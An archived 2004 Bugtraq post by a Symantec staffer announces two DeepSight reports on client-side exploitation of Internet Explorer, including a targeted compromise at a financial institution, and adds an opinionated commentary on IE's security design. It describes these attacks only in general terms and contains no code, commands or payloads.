Symantec DeepSight Threat Management System Analysis: Client-side Exploitation

From: David Ahmad (da_at_securityfocus.com)
Date: 06/25/04

  • Next message: Matt Johnston: "Mac OS X stores login/Keychain/FileVault passwords on disk" 
    Date: Fri, 25 Jun 2004 12:46:35 -0600
To: bugtraq@securityfocus.com, incidents@securityfocus.com

    Good day,

    Symantec has made two reports available to the public, listed at
    the end of this post. These documents describe instances of
    client-side exploitation. At least one instance appears to
    involve an attacker with criminal intent targeting an individual
    at a financial institution.

    I'm going to do something I almost never do (and try to
    avoid), and that's deliver a frank soapbox rant. Before that,
    I would like to acknowledge the work of the following individuals,
    without whom, many of these threats would remain unknown
    (apologies to any I've left out):

    http-equiv
    Liu Die Yu
    Drew Copely & eEye
    Jelmer
    Georgi Guninski
    GreyMagic Security
    Dror Shalev
    Thor Larholm
    Roozbeh Afrasiabi
    Andreas Sandblad
    Marc Slemko

    Client-side exploitation is nothing new. We have seen and
    discussed the potential risk posed by Microsoft Internet
    Explorer (and to a lesser extent, other client applications)
    for some time. In fact, Symantec Internet Security Threat
    Reports in the past have warned repeatedly of these issues
    specifically as future threats.

    There is really no surprise, though. It was only a matter of
    time before attackers caught on. I've said this before -- it's
    difficult for me to think of a better class of vulnerabilities:
    no dependence on version or memory layout or any other such messy
    factors, firewalls are totally irrelevant and VPNs become basically
    a free ride in, the browser doesn't end up crashing (i.e. the
    victim remains blissfully unaware that they've been owned)..
    and there seems to be an endless supply of new tricks to use,
    thanks to the labyrinthine complexity of components, subcomponents
    and the genetically mutated frankenstein* of an access control
    mechanism that is supposed to hold it all together. Finally, to
    top it all off, when a bug has been patched.. you never know if
    it has really been patched, because you're not even entirely
    sure where or what the bug is. Often these vulnerabilities are
    not single flaws, but combinations of bad behavior and weaknesses
    put together. Fix one avenue of attack and it only takes the
    discovery of another (usually code execution in Local Zone) to
    recreate the original attack. Recall the longevity of "CODEBASE"
    and other similar "non-vulnerabilities".

    Part of the problem is that MSIE has the worst feature creep that I
    have ever seen. This "thing" is now used as, fundamentally, an
    interface presentation tool. The browser is used for anything and
    everything you could possibly want it to: e-mail, applications,
    file management, multimedia... and where the browser as an entire
    application isn't used, the HTML rendering component often is.

    I do my best to maintain an unbiased stance. I think that the
    other browsers are probably just as bad, to the extent possible as
    they are not as complex and integrated into the operating system
    as MSIE. But this is the reality, folks.

    Microsoft's effort so far to understand and fix these problems one
    at a time is commendable. They are probably the best commercial
    vendor for responding to and correcting security issues.

    On the bright side, XP SP2 looks like it make some desperately
    needed changes. Let's hope a fundamental redesign is in the works
    too, because that looks like the only solution to me.

    Until then, try to make the most of your Interweb experience with
    basically every option in the MSIE security settings set to
    "Disable". Then again, why bother worrying about another
    hole in IE, or anything else for that matter. The average home PC
    is already beyond compromised with about 50 different individual
    instances of malicious code and IRC bots and spyware all competing
    with each other to log keystrokes, turn on your webcam and bind
    backdoor servers to listening ports.

    Cheers.

    * e.g. tripping on "document" vs "Document" 

    --
The reports are available at:
http://tms.symantec.com/ClientSideExploitation.asp
Client-side Exploits: Forensic Analysis of a Compromised 
Financial Services Laptop 
This document details the forensic analysis of a machine 
compromised through the use of a client-side vulnerability. 
The evidence gathered in this analysis strongly suggests that 
this client-side attack was used to specifically target a 
financial institution, with the goal of retrieving the necessary 
authentication credentials to escalate the initial attack to 
further compromise other related systems. The analysis of 
this compromise provides us with a real-world example of 
targeted attacks against a specific company, in this case, a 
company in the Financial Services sector using a client-side 
attack vector. Although not new, the targeted exploitation of 
client-side vulnerabilities has not seen extensive documentation 
or analysis. This analysis aims to provide the reader with a 
detailed description of an actual attack exploiting a client-side 
vulnerability. 
http://tms.symantec.com/documents/040617-Analysis-FinancialInstitutionCompromise.pdf
Compromised IIS Server / Unpatched Internet Explorer 
Vulnerability Exploitation Alert 
The DeepSight Threat Analyst Team has become aware of various 
public reports of Microsoft Internet Information Services (IIS) 
servers being attacked and subsequently compromised. As a second
component of the compromise, a malicious JavaScript is hosted 
on the infected IIS system and inserted into files served from 
that system. This document contains information about the 
vulnerabilities used and the subsequently deployed malcode, which 
is not available elsewhere. The malicious JavaScript in question 
is designed to compromise client systems through multiple known, 
but unpatched vulnerabilities in Internet Explorer. The resulting 
client-side infection includes, among other things, a keystroke 
logger. The Threat Analyst Team has manually captured a sample of 
the IE exploit, and resulting binary, in the DeepSight Honeynet 
system. Further investigation of the exploit resulted in the 
conclusions described below. UPDATE: This Threat Alert has been 
updated to include additional information about the client side 
exploits used in this attack. Additional information about other 
associated files has also been added. 
http://tms.symantec.com/documents/040624-Alert-CompromisedIISServerReports.pdf
-- 
David Mirza Ahmad
Symantec 
PGP: 0x26005712
8D 9A B1 33 82 3D B3 D0 40 EB  AB F0 1E 67 C6 1A 26 00 57 12
  • Next message: Matt Johnston: "Mac OS X stores login/Keychain/FileVault passwords on disk"